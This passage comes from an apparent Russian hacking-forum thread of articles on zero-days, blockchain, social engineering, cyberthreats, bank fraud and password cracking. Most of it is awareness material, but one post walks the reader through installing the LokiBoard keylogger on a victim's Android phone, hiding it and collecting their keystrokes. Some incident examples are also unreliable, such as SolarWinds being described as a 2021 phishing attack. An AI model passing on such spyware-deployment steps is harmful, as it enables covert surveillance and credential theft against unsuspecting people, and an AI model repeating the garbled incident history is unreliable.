                  После того, как вы введете правильный пароль, вы увидите кнопку «Extract secret files», нажмите на неё.

                  Поздравляем, вы научились прятать и извлекать свои секретные файлы из картинки и аудиофайла!
                  Заключение

                  Стеганография — мощный инструмент для сокрытия секретных файлов и защиты конфиденциальной информации.

                  Используя файл-обманку и специальный инструмент для стеганографии, вы можете кодировать свои секретные данные и хранить их на видном месте, не вызывая никаких подозрений. Независимо от того, хотите ли вы защитить личные данные от взора близких, бизнес отчеты или финансовые данные, стеганография поможет сохранить вашу информацию в безопасности.


                  Последний раз редактировалось BlackMAST; 13-02-2023, 18:30.

                  Комментарий


                  • #99
                    Уязвимость нулевого дня: что это такое и какую опасность несёт




                    Вступить в наш чат

                    Эксплойт нулевого дня, угроза нулевого дня, 0-day уязвимость — все чаще стали звучать в мире кибербезопасности. Но что это такое и какую опасность представляет для пользователей и компаний? В этой статье мы исследуем эти вопросы и обо всем вам расскажем.

                    Готовы? Тогда начинаем!





                    Что такое уязвимость нулевого дня?

                    Эксплойт нулевого дня — это ранее неизвестная кибератака в программном обеспечении, для которой ещё не было выпущено официальное исправление. Термин «нулевой день» отражает тот факт, что у поставщика не было времени на устранение уязвимости с момента ее обнаружения.

                    После обнаружения злоумышленники могут использовать уязвимость для запуска вредоносных атак как на организации, так и на отдельных пользователей, что часто приводит к краже данных, несанкционированному доступу и другим серьезным нарушениям безопасности.




                    Статистика по атакам нулевого дня с 2012 г. по 2021 г.
                    Как находят уязвимости нулевого дня?


                    Исследователи кибербезопасности и хакеры часто обнаруживают эти эксплойты, когда ищут уязвимости в ПО и ОС. В одних случаях обнаружение уязвимостей такого рода является совершенно случайным, в других — это результат долгого и целенаправленного поиска.
                    После их обнаружения, в даркнете начинают появляться объявления о продаже этих эксплойтов, давая злоумышленникам возможность начать атаки.
                    Как работает 0-day угроза?

                    Угрозы нулевого дня работают, используя уязвимость в программном обеспечении или операционной системе. Например, такой эксплойт может использовать уязвимость в коде, позволяющую злоумышленнику обойти меры безопасности и получить доступ к конфиденциальной информации.

                    Помимо этого, 0-day угроза дает хакеру возможность установить вредоносное ПО и даже получить полный контроль над системой.
                    Как злоумышленники используют эксплойты нулевого дня?

                    Злоумышленники могут использовать недавно обнаруженную угрозу нулевого дня различными способами:

                    Для проведения атак на определенные компании или отдельные лица (правительство, финансовые учреждения, крупные корпорации). В этих случаях цель злоумышленника часто состоит в том, чтобы украсть конфиденциальную информацию, нарушить работу и нанести ущерб организации.
                    Крупномасштабные атаки, такие как программы-вымогатели, утечки данных. В этих случаях злоумышленник может использовать уязвимость для получения доступа к персональным данным и кражи конфиденциальной информации у большого количества жертв.

                    Как защититься от угрозы?

                    Лучший способ обезопасить себя от подобных угроз — своевременно обновлять программное обеспечение и операционную систему.

                    Снижение риска атаки требует оперативного исправления уязвимостей сразу после их обнаружения. Кроме того, использование надежных паролей, антивируса и включение двухфакторной аутентификации также может помочь защититься от эксплойтов и других угроз безопасности.
                    Stuxnet-атака

                    Stuxnet - одна из самых сложных и изощренных кибератак, которая была нацелена на иранскую ядерную программу в 2010 году. Атака использовала эксплойт нулевого дня в операционной системе Windows для распространения вредоносного ПО от одного компьютера к другому, в конечном итоге достигнув систем, которые управляли центрифугами, используемыми в ядерной программе Ирана.





                    Вредоносная программа привела к тому, что центрифуги вышли из-под контроля и практически были уничтожены.

                    Атака Stuxnet — это яркая иллюстрация последствий, которые связаны с эксплойтами нулевого дня. Воспользовавшись ранее не обнаруженной уязвимостью, хакеры смогли провести целенаправленную и успешную атаку, продемонстрировав потенциальную угрозу атак нулевого дня.
                    WannaCry-атака

                    Еще один громкий случай, связанный с уязвимостью нулевого дня произошел в мае 2017 года. Хакерская группа Shadow Brokers поделились информацией об угрозе нулевого дня в Microsoft Windows, известной как EternalBlue, разработанной Агентством национальной безопасности США. Затем злоумышленники WannaCry использовали этот эксплойт, что привело к быстрому распространению атаки программы-вымогателя и заражению сотен тысяч систем в более чем 150 странах.

                    Атака WannaCry оказала значительное влияние на отдельных лиц и организации по всему миру. В результате многие предприятия были вынуждены приостановить работу и понести значительные финансовые потери. Помимо всего прочего, атака также затронула организации здравоохранения, вызвав перебои в работе медицинских учреждений, подвергнув пациентов опасности.

                    Атака WannaCry стала тревожным звонком для многих организаций, подчеркнув важность сохранения бдительности в отношении угроз нулевого дня и принятия мер для дальнейшей защиты.
                    Операция Аврора

                    В 2009 и 2010 годах была осуществлена еще одна сложнейшая кибератака под названием Операция Аврора, нацеленная на ряд высокотехнологичных компаний, включая Google.

                    Атака, которая, как многие считают, исходила из Китая и спонсировалась государством, вызвала широкую обеспокоенность среди общественности. Операция Аврора оказала значительное влияние на целевые организации, особенно в сфере высоких технологий. Многие компании понесли финансовые убытки в результате кражи конфиденциальной информации и интеллектуальной собственности.

                    После атаки в рамках операции «Аврора» пострадавшие организации приняли меры по усилению мер кибербезопасности. Они укрепили свои системы кибербезопасности для предотвращения подобных атак в будущем.
                    Заключение

                    Таким образом, можно сделать вывод о том, что уязвимость нулевого дня представляет значительную угрозу как организациям, так и отдельным лицам. Крайне важно понимать, как устроена угроза и какой вред она несет. Инциденты, связанные с уязвимостями, подчеркивают необходимость принятия строгих мер безопасности для защиты от угроз, создаваемых эксплойтами нулевого дня. Регулярно обновляя свое программное обеспечение и принимая другие меры безопасности, вы можете снизить риск атаки нулевого дня и защитить свои данные.


                    Последний раз редактировалось BlackMAST; 16-02-2023, 17:34.

                    Комментарий


                    • Основы блокчейна для чайников




                      Вступить в наш чат

                      В последние годы технология блокчейн стала модным словом, но многие люди до сих пор не понимают, что это такое и как оно работает. В этой статье мы рассмотрим основы блокчейна и то, как он изменил мир финансов, управление цепочками поставок и многое другое.





                      Что такое Блокчейн?

                      Блокчейн — это децентрализованная цифровая база данных информации, которая регистрирует и хранит все совершенные транзакции. При этом данные поступают блоками, которые объедены в цепочку, что делает их неизменяемыми. Неизменяемый реестр означает, что после того, как транзакция была записана, ее нельзя изменить или удалить. Блокчейн применяется для постоянного и безопасного хранения и передачи всех транзакций в сети.
                      Как работает блокчейн?

                      Он записывает транзакции в блоки, связывая их вместе, чтобы сформировать цепочку. Каждый блок содержит уникальный код, называемый хешем, который связывает его с предыдущим блоком. Это создает безопасную и бесконечную запись всех сделок в сети.

                      Чтобы совершить транзакцию в блокчейне, пользователь должен сначала создать цифровую подпись — это уникальный код, который идентифицирует пользователя и авторизует транзакцию. Проверка и добавление транзакции в следующий блок в цепочке происходит после ее трансляции в сеть. Добавление транзакции в цепочку делает ее постоянной и видимой для всех в сети.
                      Применение блокчейна

                      Считается, что возможности Блокчейн ограничиваются лишь передачей криптовалюты, однако, это неправда. Блокчейн имеет широкий спектр применений, в том числе:

                      Управление цепочками поставок: использование блокчейна отслеживает движение товаров и материалов по цепочке поставок, обеспечивая прозрачность и контроль.
                      Здравоохранение: блокчейн создает безопасное хранение и управление медицинскими записями пациентов, тем самым улучшая конфиденциальность и сохранность данных.
                      Финансы: с помощью блокчейна может улучшить финансовые транзакции, сделав их быстрее, безопаснее и дешевле.

                      Влияние Блокчейна на финансы и цепочку поставок

                      1. Децентрализация. Децентрализованный характер технологии блокчейна является одной из ее важнейших особенностей. В отличие от традиционных систем, которые полагаются на центральный орган, он работает в децентрализованной и распределенной сети компьютеров, эффективно устраняя необходимость в посредниках и тем самым делая транзакции более безопасными и прозрачными.

                      2. Распределенный реестр. Копии реестра хранятся на нескольких компьютерах в сети, что практически исключает взлом, поскольку это потребовало бы изменения реестра на каждом компьютере в сети.

                      3. Неизменяемость. Неизменяемость реестра в технологии блокчейн гарантирует, что записанные транзакции остаются там навсегда и не могут быть изменены или удалены. Это создает постоянную и безопасную запись всех транзакций в сети.

                      4. Транзакции. Чтобы совершить транзакцию в блокчейне, пользователь создает цифровую подпись, чтобы идентифицировать себя и авторизовать транзакцию. Затем сеть проверяет транзакцию и транслирует ее, добавляя к следующему блоку в цепочке.

                      5. Блоки. Цепочка формируется путем соединения блоков, в которых записываются транзакции. Каждый блок содержит уникальный код, называемый хешем, который связывает его с предыдущим блоком. Это создает безопасную и бесконечную запись всех сделок в сети.

                      6. Алгоритм консенсуса. Алгоритм консенсуса — это процесс, с помощью которого сеть компьютеров достигает соглашения о текущем состоянии реестра. Алгоритм консенсуса гарантирует, что сеть достигает соглашения, не полагаясь на центральный орган. Блокчейн обычно использует Proof of Work (PoW) в качестве алгоритма консенсуса.

                      7. Криптография. Также Блокчейн использует криптографию для защиты транзакций и обеспечения целостности реестра. Это включает в себя использование цифровых подписей и хеширование для защиты транзакций и связывания блоков в цепочку.

                      8. Смарт-контракты. Смарт-контракт — это самоисполняющийся контракт, условия которого прямо прописаны в коде. Смарт-контракты автоматизируют процессы и устраняют необходимость в посредниках, ускоряя транзакции и делая их более эффективными.

                      Заключение

                      Блокчейн — это революционная технология, которая может трансформировать многие сферы нашей жизни. Понимая основы блокчейна, сложно не отметить его положительное влияние. Децентрализованный и безопасный характер блокчейна делает его идеальным для широкого спектра применений, включая финансы, управление цепочками поставок и даже здравоохранение. Многие государства и компании мирового уровня уже внедряют в свою деятельность и структуру технологию Блокчейн. А вы как вы считаете, сможет ли Блокчейн изменить мир в лучшую сторону?


                      Комментарий


                      • Социальная инженерия как способ «взломать» человека


                        «На сегодняшний день нет такой технологии, которую нельзя было бы взломать с помощью социальной инженерии» - Френк Абигнейл.February 22, 2023





                        Вступить в наш чат

                        Если вы спросите специалиста по кибербезопасности: «Какое самое слабое звено в любой системе?» Ответ вас удивит — это люди.

                        Атака с использованием социальной инженерии — это тип кибератаки, в которой используются психологические манипуляции, чтобы заставить людей разгласить конфиденциальную информацию или выполнить действия, которые помогут злоумышленнику получить доступ к системе или личным данным. Эти атаки могут быть невероятно эффективными, а их последствия могут варьироваться от кражи личной информации до репутационного ущерба крупной компании и финансовых потерь.

                        В этой статье мы расскажем о различных видах атак социальной инженерии, методах, используемых злоумышленниками, и о том, как их предотвратить.





                        Виды атак социальной инженерии

                        Фишинг

                        Фишинговая атака — это атака с использованием социальной инженерии, включающая отправку электронных писем, сообщений под видом банка, интернет-магазина и других организаций, чтобы обманным путем заставить пользователей раскрыть свою личную информацию, такую как пароли или номера кредитных карт. Обычно фишинг относится к социальной инженерии, потому что в этом мошенничестве ключевую роль играет человеческая ошибка.

                        В 2018 году произошла крупная фишинговая атака, направленная на криптовалютную биржу Binance. Злоумышленники создали поддельный веб-сайт, который выглядел в точности как «Binance», и рассылали пользователям электронные письма с просьбой войти в свои учетные записи. Когда пользователи ввели свои учетные данные для входа, злоумышленники смогли получить доступ к их аккаунтам и украсть их криптовалюты.

                        Байтинг

                        Байтинг – метод, похожий на фишинг, также включающий в себя использование социальной инженерии. Его суть — заставить человека сделать то, что он обычно не делает, например, загрузить файл или открыть ссылку, предлагая определенное вознаграждение, такое как бесплатный подарок или скидку.

                        В 2011 году байтинг атака была направлена против Торговой палаты США. Нападавшие оставили USB-накопители на парковке штаб-квартиры Палаты. Когда сотрудники нашли их и подключили к своим компьютерам, было установлено вредоносное ПО, которое позволило злоумышленникам получить доступ к компьютерной сети Палаты.

                        Претекстинг

                        Обычно такая атака предполагает обращение к жертве по телефону с заранее заготовленным сценарием (претекстом), чтобы убедить человека раскрыть конфиденциальную информацию, например, данные кредитной карты.

                        В 2018 году атака со сценарием была направлена ​​на город Атланта. Злоумышленники представились сотрудниками компании, предоставляющей ИТ-услуги по городу, и убедили настоящих сотрудников раскрыть свои учетные данные для входа в систему. Злоумышленники смогли установить программу-вымогатель в компьютерной сети города и потребовали выкуп.

                        Целевой фишинг

                        Целевой фишинг — тип атаки, когда фишинг-сообщение отправляется не группе случайных пользователей, а конкретному лицу. Мошенники тщательно собирают информацию о пользователе, чтобы максимально персонализировать сообщение и сделать фишинг более эффективным.

                        В 2016 году целевая фишинговая атака была направлена против Национального комитета Демократической партии США. Злоумышленники разослали электронные письма сотрудникам DNC с просьбой сбросить пароли электронной почты. Когда сотрудники нажали на ссылку в электронном письме, они попали на поддельный веб-сайт, который выглядел как страница входа в электронную почту DNC. Злоумышленники смогли украсть конфиденциальную информацию и слить ее общественности.

                        Тейлгейтинг

                        Чтобы взломать хорошо защищенную цель, хакеры могут даже попытаться проникнуть в штаб-квартиру компании. Самая популярная уловка, которую используют преступники, не заключается в подделке учетных данных, все намного проще: злоумышленник просто проходит за кем-то, когда тот открывает дверь. В зарубежных компаниях эту практику называют «тейлгейтинг». Находясь внутри здания, хакеры используют манипуляции и хитрые уловки: при помощи навыков социальной инженерии, они обходят охранников, получают доступ к компьютерам и даже крадут документы.

                        В 2019 году тейлгейтинг-атака была нацелена на технологическую компанию Кремниевой долины. Злоумышленник выдал себя за курьера и проследовал за сотрудником в здание компании. Оказавшись внутри, злоумышленник смог украсть несколько ноутбуков.

                        Методы социальной инженерии

                        Злоумышленники используют ряд методов, чтобы завоевать доверие своей жертвы и заставить ее сделать что-то, что противоречит ее интересам. Некоторые из этих методов включают в себя:

                        Острая необходимость. Создание ощущения срочности и безотлагательности помогает убедить людей действовать быстро, не задумываясь о последствиях.
                        Власть. Злоумышленники изображают из себя авторитетных лиц, таких как сотрудники правоохранительных органов или специалисты по ИТ-безопасности, чтобы втереться в доверие своей жертвы.
                        Эмоция. Игра на эмоциях, таких как страх или сочувствие помогает злоумышленникам манипулировать жертвой и добиться желаемого в кратчайший срок.
                        Дефицит. Следующий метод заключается в создании ощущения нехватки или ограниченности, чтобы убедить жертву предпринять немедленные действия, например совершить покупку или разгласить личную информацию.
                        Знакомство. Чтобы завоевать доверие, злоумышленники выдают себя за людей или организации, с которыми жертва знакома или чьими услугами пользуется, например коллега или банк.
                        Запугивание. Тактика запугивания, например, с помощью угроз судебного иска или физической расправы, подталкивает людей к необдуманным поступкам, таким как разглашение конфиденциальной информации.
                        Обратная социальная инженерия. При обратной социальной инженерии злоумышленник позиционирует себя как жертву, нуждающуюся в помощи. Как только жертва проявит сочувствие, злоумышленник может получить доступ к личным данным.

                        Важно быть в курсе новейших методов социальной инженерии и проявлять осторожность при взаимодействии с незнакомыми людьми или организациями, особенно в Интернете.

                        Меры предосторожности

                        Чтобы предотвратить атаки социальной инженерии, следует:

                        Быть осторожным с электронными письмами и сообщениями от неизвестных источников: не переходите по ссылкам и ничего не загружайте из вложений. Прежде чем предпринимать какие-либо действия, проверьте личность отправителя.
                        Используйте многофакторную аутентификацию. Она помогает обеспечить вас дополнительным уровнем защиты. Злоумышленник не сможет получить доступ к вашим данным, если не будет знать код, отправленный на ваш телефон.
                        Используйте надежные и уникальные пароли. Сложные пароли труднее угадать, что затрудняет задачу для злоумышленников.
                        Установите защитное программное обеспечение: установите антивирусное и антивредоносное программное обеспечение на все устройства, чтобы обнаруживать и предотвращать атаки.
                        Будьте бдительны: всегда будьте на чеку и сообщайте о любых подозрительных действиях в соответствующие органы.

                        Заключение

                        Атаки социальной инженерии становятся все более изощренными и опасными. Не стоит недооценивать злоумышленников, которые используют ряд тактик и методов, чтобы завоевать доверие своих жертв и манипулировать ими для получения желаемого. Чтобы предотвратить атаки с использованием социальной инженерии, отдельные пользователи и организации должны проявлять бдительность и принимать меры, необходимые для защиты от этих атак. Выполнив советы по безопасности, описанные в этой статье, вы можете помочь защитить себя от атак социальной инженерии.

                        На этом все. Удачи!




                        Последний раз редактировалось BlackMAST; 13-03-2023, 23:04.

                        Комментарий


                        • Главные киберугрозы в 2023




                          Вступить в наш чат

                          Количество кибератак растет по мере того, как мы становимся все более зависимыми от технологий и Интернета. Новые киберугрозы постоянно развиваются, становятся все более изощренными и непредсказуемыми, что затрудняет защиту наших данных. Чтобы суметь предотвратить риски, важно быть в курсе последних событий в мире хакинга.

                          В этой статье мы расскажем вам о новых киберугрозах с примерами из жизни и поделимся практическими советами о том, как защитить себя.





                          Атаки программ-вымогателей

                          Атаки программ-вымогателей — одни из самых разрушительных типов кибератак. Программа-вымогатель — это разновидность вредоносного ПО, которое шифрует ваши файлы и требует выкупа в обмен на ключ дешифрования. Такие атаки наносят значительный ущерб пользователям и компаниям, часто приводя к потере и краже данных.

                          Более того, в последние годы злоумышленники стали более изощренными и применяют новые тактики, такие как двойное вымогательство, при котором они сначала крадут данные, а затем шифруют их, чтобы потребовать выкуп.

                          В 2021 году атака программы-вымогателя была нацелена на Colonial Pipeline, крупный топливный трубопровод в Соединенных Штатах, что привело к повсеместной нехватке топлива и паническим закупкам в нескольких штатах.

                          Защита от угроз программ-вымогателей

                          Чтобы защитить себя от атак программ-вымогателей, убедитесь, что у вас есть надлежащие резервные копии ваших данных.
                          Также регулярно обновляйте свое программное обеспечение и соблюдайте осторожность при открытии электронных писем, сообщений из неизвестных источников.
                          Регулярное сканирование ваших устройств на наличие уязвимостей может помочь вам обнаружить программу-вымогатель.

                          Фишинговые атаки

                          Фишинговые атаки — это тип кибератаки, при которой жертву обманом заставляют сообщать личную информацию, такую как учетные данные для входа, номера кредитных карт и другие конфиденциальные данные.

                          Злоумышленники используют различные тактики, такие как электронные письма, сообщения или телефонные звонки. Фишинговые атаки широко распространены и представляют значительный риск для доверчивых и невнимательных пользователей. Киберпреступники становятся все более виртуозными в создании убедительных сценариев, поддельных веб-сайтов и страниц для входа.

                          В 2021 году произошла фишинговая атака на компанию-разработчика программного обеспечения SolarWinds, которая привела к крупному сбою поставок и затронула несколько государственных учреждений и частных компаний США.

                          Защита от фишинговых угроз

                          Чтобы защитить себя от фишинговых атак, всегда будьте осторожны при переходе по ссылкам или загрузке файлов из неизвестных источников.
                          Убедитесь, что у вас установлено ПО для защиты от фишинга.
                          Регулярно обновляйте программное обеспечение и антивирус.
                          Относитесь с подозрением к любым нежелательными сообщениям и звонкам из неизвестных источников.

                          Безопасность Интернета вещей (IoT)

                          Интернет вещей (IoT) — это сеть физических устройств, транспортных средств и других объектов, оснащенных датчиками, программным обеспечением и средствами связи, что позволяет им подключаться и обмениваться данными. Эти устройства имеют много преимуществ, но они также представляют значительный риск для безопасности. Устройства IoT могут быть уязвимы для атак и могут использоваться для получения доступа к другим частям сети.

                          В 2021 году в популярной системе умных дверных замков была обнаружена уязвимость, которая позволила злоумышленникам удаленно открывать двери без особого труда. Таким образом, эта уязвимость долго использовалась для получения доступа к чужим домам и предприятиям.

                          Защита от IoT-угроз

                          Чтобы защитить себя от угроз безопасности IoT, важно убедиться, что вы меняете пароли по умолчанию на устройствах IoT и поддерживаете их программное обеспечение в актуальном состоянии.
                          Для дополнительной защиты используйте отдельную сеть для IoT устройств, чтобы изолировать их.
                          Кроме того, регулярно проверяйте свои устройства на наличие подозрительной активности и отключайте все неиспользуемые функции.

                          Облачная безопасность

                          Облачные хранилища становятся все более популярными, но также имеют свои уязвимости в безопасности. Облачная безопасность относится к защите данных и приложений, размещенных на удаленных серверах.

                          В 2021 году неправильно настроенный облачный сервер привел к утечке данных, в результате которой была раскрыта личная информация миллионов пользователей популярного мобильного приложения.

                          Как защитить свое облачное хранилище

                          Чтобы защитить себя от угроз, важно выбирать надежных облачных провайдеров, использовать надежные пароли и включать многофакторную аутентификацию.
                          Вы также должны регулярно проверять свои облачные хранилища на предмет необычной активности и шифровать данные.

                          Внутренние угрозы

                          Внутренние угрозы происходят со стороны сотрудников или подрядчиков, имеющих доступ к конфиденциальной информации. Они могут быть как умышленными, так и непреднамеренными. В первом случае лица могут случайным образом совершить ошибку по невнимательности, которая приведет к подрыву безопасности. Во втором же — это запланированная операция сотрудниками, имеющими конфиденциальный доступ к данным.

                          В 2013 году Эдвард Сноуден, подрядчик Агентства национальной безопасности (АНБ), передал в прессу секретную информацию о программах наблюдения агентства. Утечка стала одной из крупнейших в истории и нанесла значительный ущерб репутации АНБ.

                          Защита от внутренних угроз

                          Для защиты от внутренних угроз организации должны иметь четкие правила и процедуры для управления доступом конфиденциальными данными и системами. Они должны включать регулярное обучение сотрудников и подрядчиков тому, как выявлять подозрительное поведение и сразу же докладывать о нем.
                          Также важно отслеживать действия пользователей и внедрять средства управления безопасностью, такие как контроль доступа, предотвращение потери данных и аналитика поведения сотрудников.

                          Киберфизические атаки

                          Киберфизические атаки — это тип кибератак, направленных на физические системы или инфраструктуру (электрические сети, транспортные системы и промышленные системы управления). Они становятся все более распространенными по мере того, как системы все чаще зависят от технологий. Эти атаки могут повлечь за собой реальный ущерб и сбои в системе.

                          Одним из примеров киберфизической атаки является червь Stuxnet, который был обнаружен в 2010 году. Червь Stuxnet был разработан для атак на промышленные системы управления, используемые на ядерных объектах в Иране. Он смог нанести физический ущерб центрифугам, используемым при обогащении урана с помощью манипуляций их рабочими параметрами. Атака была сложной и требовала высокого уровня знаний для ее выполнения. Именно поэтому, многие убеждены, что это было осуществлено правительством.

                          Защита от киберфизических угроз

                          Для защиты от киберфизических атак организациям необходимо применять многоуровневый подход к безопасности:

                          Внедрение строгого контроля доступа и механизмов аутентификации для предотвращения неразрешенного доступа к критически важным системам.
                          Мониторинг систем на предмет подозрительной активности и внедрение средств безопасности, которые могут обнаруживать и предотвращать атаки.

                          Заключение

                          Рассмотренные выше примеры иллюстрируют реальное влияние киберугроз. Поскольку технологии продолжают развиваться, организациям и отдельным лицам важно сохранять бдительность и предпринимать шаги для защиты от возможных угроз. Будьте в курсе последних тенденций в области безопасности, а мы поможем минимизировать риск кибератак и защитить ваши конфиденциальные данные. На этом все. Удачи!




                          Последний раз редактировалось BlackMAST; 13-03-2023, 23:04.

                          Комментарий


                          • Обзор Loki Board — бесплатный кейлоггер для Android


                            Опытные взломщики владеют сотнями инструментов, с помощью которых они могут красть учетные данные, взламывать системы кибербезопасности и многое другое. Возможно, самым действенным из всех приложений является кейлоггер. Кейлоггер — необходимый инструмент в арсенале каждого хакера, но, как и многие другие инструменты, он требует наличие Kali Linux. Однако, сегодня мы поделимся с вами карманным, а главное бесплатным кейлоггером для Android под названием LokiBoard.



                            Что такое кейлоггер

                            Кейлоггер — своеобразный клавиатурный шпион, который собирает нажатия клавиш и ведет учет всей сохраненной информации. Кейлоггер чаще всего используется для сбора конфиденциальных данных, например, паролей.
                            Кейлоггеры остаются незамеченными в течение длительного времени, регистрируя действия с клавиатуры и давая злоумышленнику возможность ближе подобраться к личной информации жертвы. Кейлоггеры крайне опасны для жертвы, потому что их трудно обнаружить, но очень эффективны для хакеров.
                            Сегодня же речь пойдет о кейлоггере LokiBoard, который вы можете скачать прямо на телефон. Это простое в использовании приложение с открытым исходным кодом, которое необходимо установить на устройстве жертвы, после чего оно будет записывать все нажатия клавиш.
                            Скачать кейлоггер Lokiboard в Google Play.

                            Как использовать кейлоггер LokiBoard

                            Шаг 1: Установите приложение на устройство жертвы.
                            Шаг 2: Откройте раздел «Язык и ввод» в настройках системы Android.
                            Шаг 3: Включите Lokiboard и отключите все другие формы ввода, чтобы использовалось только наше приложение.
                            Шаг 4: Поскольку иконка приложения отсутствует на главном экране по понятным причинам, войти в LokiBoard можно, коснувшись LokiBoard в разделе языка и ввода в настройках.
                            Шаг 5: Как только жертва наберет текст на клавиатуре, все нажатия клавиш автоматически будут сохранены, и с помощью файлового менеджера вы сможете легко получить доступ к данным кейлоггера.
                            Путь, по которому будут сохранены нажатия показан ниже:




                            Вот и все. Это был один из самых известных кейлоггеров для Android, благодаря которому вы можете получить доступ к личной информации жертвы прямо в телефоне без использования Kali Linux. Надеемся, что данная статья оказалась полезной для вас. Удачи!





















                            Комментарий


                            • Банковское мошенничество: выводим злоумышленников на чистую воду




                              В последнее время число банковских афер выросло до такой степени, что уже невозможно оставаться в стороне, игнорируя риски. Киберпреступники становятся все умнее и изобретательнее, когда дело касается взлома с помощью социальной инженерии. Наверняка, каждому из вас хоть раз поступал звонок или приходило сообщение, отправителем которого якобы являлся банк. Ключ к вашей безопасности — умение отличать подлинное сообщение от мошеннических уловок.
                              Узнайте, какие приемы используют банковские мошенники, а также 10 клише-сценариев, которые они активно применяют в своих злодеяниях.




                              1. «Подтвердите свою личность»

                              Сообщение, звонок или электронное письмо с просьбой предоставить конфиденциальную информацию, чтобы «подтвердить», что это вы.
                              Ваш банк может время от времени отправлять вам сообщения из соображений безопасности в случаях подозрительной активности на вашем счете — но банк никогда не попросит вас подтвердить вашу личность, предоставив секретную информацию по телефону или в виде сообщений.
                              Если вы сомневаетесь, то не нажимайте на ссылки, не отвечайте на электронные письма, не звоните по каким-либо номерам. Вместо этого позвоните в свой банк по его официальному номеру службы поддержки и убедитесь, что сообщение поступило от них.
                              2. «Обновите ваше банковское приложение»

                              Банки никогда не попросят вас установить или обновить приложение по электронной почте. При загрузке и обновлении всегда используйте официальный магазин приложений в вашем телефоне, избегая всех других источников, потому что, установив приложение из сообщения, ваша система будет скомпрометирована, а учетная запись взломана.
                              3. «Через 30 минут ваша карта будет заблокирована»

                              Если вам поступило сообщение о том, что ваша карта будет заблокирована, поэтому нужно срочно позвонить на какой-то номер или перейти по ссылке, не спешите это делать. Ваш банк может временно заморозить вашу карту в том случае, если была замечена подозрительная активность или мошенничество. Но банки не сообщают сроки по электронной почте или в сообщениях, тем более не закрывают счета без вашего ведома. Вместо этого, они предпримут необходимые юридические процедуры, и вы будете уведомлены об этом лично. Любое сообщение с дедлайном — фейк. Хакеры создают ощущение срочности и неотложности, чтобы у жертвы было как можно меньше времени на раздумья и проверку подлинности сообщения. В случае подозрительных сообщений звоните только на официальный номер своего банка.
                              4. «Сохраните документ во вложении»

                              Мошенники с помощью электронных писем распространяют документ зараженный банковским троянцем Emotet. С его помощью злоумышленники получают доступ к данным на устройствах. Как только пользователь откроет такое вложение, Emotet автоматически установится на компьютер, поставив под угрозу все пароли и безопасность.
                              Ваш банк не будет распространять приложения, документы и файлы таким образом — вместо этого попросит скачать из официального магазина приложений или с официального сайта.
                              5. «Отправили курьера, чтобы забрать вашу неисправную банковскую карту»

                              Вам поступает звонок от оператора банка, который сообщает, что ваша карта неисправна, поэтому требуется срочная замена. После чего оператор добродушно предлагает отправить курьера, чтобы тот передал новую карту и забрал старую. Когда курьер прибудет, он запросит PIN-код вашей карты в качестве «подтверждения». И вскоре – все ваши деньги волшебным образом исчезнут. Жертвами этого сценария стали тысячи людей — не поддавайтесь на такие аферы.
                              Если ваша карта действительно неисправна, то банк попросит вас лично приехать в офис для решения проблемы.
                              6. «Продиктуйте, пожалуйста, ваш CVV код»

                              Старый метод мошенничества, при котором вам поступает звонок либо из «полиции», либо из «вашего банка», где сообщается, что на вашей карте или банковском счёте была обнаружена мошенническая деятельность. Голос по телефону будет спекулировать юридическими терминами, ссылаться на правовые акты, пытаясь внушить вам законность своих действий, а затем мимоходом запросит у вас пароль или другую конфиденциальную информацию.
                              Банки никогда не будут запрашивать такие детали по телефону или в сообщениях. Не поддавайтесь на эти очевидные мошеннические схемы.
                              7. Фишинговая страница сайта банка

                              Злоумышленники создают поддельные сайты, которые в точности выглядит как настоящие. Единственная их разница — это URL-адрес, который незначительно отличается. Допустим, вы хотели попасть на сайт ВТБ, но по невнимательности открыли фишинговую ссылку «vtbb.ru» вместо официальной «vtb.ru» — вы оказались на фейковом сайте, который создали мошенники для компрометации банковских карт.
                              Внимательно проверяйте URL-адрес, чтобы убедиться, что это действительно настоящий веб-сайт. Вы всегда можете добавить ссылки на часто посещаемые страницы в быстрый поиск, так вы сэкономите время на проверки.
                              8. Обращение «Уважаемый клиент» или «Дорогой вашимейл@gmail.com»

                              Банки всегда будут обращаться к вам по имени и отчеству. Любые электронные письма, начинающиеся с «Уважаемый клиент» или «Уважаемый [адрес электронной почты]», являются поддельными, и в основном представляют собой автоматический спам, используемый для получения персональных данных или распространения вирусов. Не доверяйте ни одному электронному письму с такими очевидным обманом.
                              9. Сообщение с пустым адресным полем или с большим количеством упомянутых имейлов

                              Если вы получаете сообщение от вашего настоящего банка, оно должно быть адресовано только вам — не только в сообщении, но и в шапке письма. Убедитесь, что электронная почта совпадает с официальной, указанной на сайте.
                              10. Электронное письмо с просьбой подтвердить информацию

                              Если вы видите сообщение или электронное письмо с просьбой подтвердить какую-либо информациию, закройте его и позвоните в свой банк. Банк никогда не отправит подобных сообщений — в случае подозрительной активности вас попросят связаться с банком напрямую. Не отвечайте на такие письма, вместо этого сообщите о них как о спаме.
                              Заключение

                              Злоумышленники искусно владеют социальной инженерией и готовы пойти на все, чтобы обманным путем выведать у вас персональную информацию и банковские данные. Их приемы, хоть и являются, на первый взгляд, банальными, уже многие годы оставляют людей без денег на счетах. Попасть на удочку может любой — не только по глупости и доверчивости, но и по невнимательности. Если вы сомневаетесь в законности сообщения или звонка, обратитесь за профессиональной помощью в банк, чтобы защитить себя и свои деньги от банковского мошенничества. На этом все. Будьте внимательны и осторожны!

                              Комментарий


                              • Как взломать пароли с помощью John The Ripper (linux, zip, rar, hash)

                                Сегодня мы научимся взламывать пароли вместе с John The Ripper или, как его еще называют, Джоном Потрошителем. Если вы никогда не слышали об этом инструменте, то вы многое пропустили. Джон Потрошитель — это утилита для взлома паролей с открытым исходным кодом, которой активно пользуются все взломщики. Многофункциональность и большие возможности инструмента сделали его фаворитом многих людей в хакерском сообществе.


                                Что такое John the Ripper

                                Как упоминалось ранее, John the Ripper — это инструмент для взлома паролей, разработанный OpenWall, который по умолчанию включен в Kali Linux. Он может автоматически обнаруживать и расшифровывать хешированные пароли, что является стандартным способом хранения паролей во всех операционных системах. Джон Потрошитель является полноценным инструментом для взлома паролей, но также имеет платные версии с дополнительными функциями.
                                Итак, давайте приступим к взлому.
                                Скачать бесплатную версию Джона можно здесь.
                                Если у вас Kali Linux, то утилита уже предустановлена.
                                Мы подготовили следующие 4 руководства для взлома паролей с помощью John The Ripper:
                                1. Взлом паролей Linux;
                                2. Взлом файлов Zip, Rar, защищенных паролем;
                                3. Расшифровка хэш-файлов;
                                4. Использование списка слов для взлома паролей.


                                1. Взлом паролей Linux

